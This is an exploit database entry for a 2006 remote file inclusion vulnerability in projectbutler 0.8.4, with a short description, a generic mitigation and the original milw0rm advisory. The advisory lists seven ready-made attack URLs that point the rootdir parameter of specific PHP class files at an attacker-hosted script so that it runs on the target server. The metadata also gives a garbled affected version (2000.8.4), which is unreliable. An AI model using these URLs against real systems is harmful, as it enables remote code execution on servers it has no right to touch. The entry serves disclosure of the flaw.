projectbutler-0.8.4 Remote File Inclusion Vulnerability

vendor:

projectbutler

by:

the master

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: projectbutler

Affected Version From: 2000.8.4

Affected Version To: 2000.8.4

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

projectbutler-0.8.4 Remote File Inclusion Vulnerability

projectbutler-0.8.4 is vulnerable to Remote File Inclusion. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. The malicious URL contains a script which is then executed on the vulnerable server.

Mitigation:

Input validation should be used to prevent malicious input from being passed to the application. The application should also be configured to use the least privileged user account.

Source

Exploit-DB raw data:

########################################################################
#  projectbutler-0.8.4  Remote File Inclusion Vulnerability
#
#  Download: http://prdownloads.sourceforge.net/projectbutler/projectbutler-0.8.4.tar.gz?download
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/classes/Cache.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/Customer.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/Performance.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/Project.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/Representative.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/User.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/common.php?rootdir=http://cmd.gif?
########################################################################

# milw0rm.com [2006-08-14]